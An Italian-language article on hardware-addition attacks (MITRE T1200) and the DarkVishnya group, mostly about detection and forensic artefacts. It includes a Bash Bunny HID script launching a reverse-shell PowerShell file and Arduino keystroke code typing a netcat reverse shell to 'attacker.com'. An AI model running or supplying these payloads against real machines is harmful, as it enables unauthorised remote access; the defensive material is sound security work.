Hardware Malevolo: Hardware Additions (T1200)

L'arsenale hardware per penetration testing include diversi dispositivi commerciali e open source. Il Bash Bunny, utilizzato dal gruppo DarkVishnya, rappresenta l'entry level per questo tipo di attacchi.

Per configurare un Bash Bunny in modalità HID injection:

ATTACKMODE HID STORAGE
LED SETUP
QUACK STRING powershell -ExecutionPolicy Bypass -File \reverse_shell.ps1
LED FINISH

I Raspberry Pi offrono maggiore flessibilità. Una configurazione base per network tapping richiede due interfacce di rete:

sudo brctl addbr br0 sudo brctl addif br0 eth0 sudo brctl addif br0 eth1 sudo ifconfig br0 up

Per attacchi DMA via Thunderbolt, PCILeech rappresenta lo stato dell'arte. Il framework supporta lettura e scrittura diretta della memoria fisica bypassando le protezioni del sistema operativo.

L'iniezione di keystroke può essere automatizzata tramite Arduino con libreria Keyboard:

Keyboard.begin();
delay(3000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
Keyboard.print("cmd /c nc.exe attacker.com 4444 -e cmd.exe");
Keyboard.press(KEY_RETURN);

Gli access point rogue richiedono hardware WiFi supportato da hostapd. La configurazione minimale prevede SSID identico alla rete aziendale con credenziali deboli per catturare hash WPA2.

La detection di hardware malevolo richiede correlazione multi-sorgente tra eventi di sistema e traffico di rete. Windows genera l'EventCode 6416 quando un nuovo dispositivo viene riconosciuto dal sistema.

Il monitoraggio Sysmon deve includere la creazione di nuovi processi entro 10-60 minuti dal riconoscimento hardware. Query WQL per correlazione temporale:

DeviceClass="USB" AND TimeGenerated > [DeviceEventTime] AND ProcessName NOT IN ("explorer.exe", "svchost.exe")

Su Linux, udev e syslog registrano eventi hot-plug. La catena di detection prevede:

• Parsing di /var/log/messages per stringhe "new USB device"
• Correlazione con auditd SYSCALL su /dev/*
• Verifica nuovi lease DHCP entro finestra temporale

macOS richiede parsing dei unified logs con filtro sui subsystem IOUSBHost e IOThunderbolt. FSEvents traccia modifiche al filesystem successive all'inserimento hardware.

I falsi positivi derivano principalmente da dispositivi aziendali legittimi. La creazione di whitelist basate su VID:PID (Vendor ID:Product ID) riduce drasticamente il rumore. Dispositivi con stringhe sospette come "RubberDucky" o "BadUSB" devono generare alert ad alta priorità.

La ricostruzione forense di un attacco hardware inizia dall'identificazione del punto di inserimento fisico. Windows mantiene traccia storica dei dispositivi collegati nel registro di sistema.

Le chiavi forensi principali risiedono in:

• HKLM\SYSTEM\CurrentControlSet\Enum\USB
• HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR

Ogni dispositivo lascia timestamp di prima e ultima connessione. Il parsing di setupapi.dev.log fornisce dettagli aggiuntivi su driver installati.

DarkVishnya ha dimostrato pattern specifici: connessione iniziale di netbook economici seguita da installazione di tool di persistenza entro 30 minuti. La timeline tipica mostra:

1. Riconoscimento hardware (T+0)
2. Mount automatico storage (T+30 secondi)
3. Esecuzione payload (T+2 minuti)
4. Cancellazione tracce (T+15 minuti)

Su sistemi Linux, journalctl conserva eventi udev con timestamp precisi. La correlazione con /var/log/secure evidenzia tentativi di privilege escalation post-inserimento.

Gli artefatti di rete includono nuovi MAC address nei log DHCP e anomalie nei flow di traffico verso IP esterni non categorizzati. L'analisi del traffico DNS spesso rivela domini di comando e controllo registrati di recente.

DarkVishnya rappresenta l'unico gruppo APT con utilizzo documentato di hardware additions. Il profilo operativo mostra targeting esclusivo del settore finanziario nell'Europa dell'Est.

L'arsenale hardware del gruppo include:

• Bash Bunny per initial foothold
• Raspberry Pi configurati come drop box
• Netbook economici con OS custom
• Laptop consumer-grade per operazioni prolungate

Il modus operandi prevede accesso fisico tramite social engineering o insider threat. La persistenza viene garantita nascondendo dispositivi in aree poco visibili come controsoffitti o armadi di rete.

L'evoluzione tattica suggerisce possibile adozione di:

• Hardware con form factor ridotto (USB-C dongles)
• Dispositivi con capacità wireless mesh
• Integration con supply chain attacks
• Sfruttamento di vulnerabilità Thunderbolt/DMA

La limitata visibilità pubblica su questa tecnica indica possibile sottostima dell'utilizzo reale. Red team commerciali confermano adoption rate crescente per simulazioni di insider threat. La convergenza con tecniche di physical security bypass aumenta la superficie d'attacco complessiva.

Framework MITRE ATT&CK T1200. Documentazione gruppo APT DarkVishnya per targeting settore finanziario. Best practices device control da Microsoft Defender documentation. Standard IEEE 802.1x per network access control. Configurazioni Group Policy Objects per USB restriction in ambienti Windows enterprise.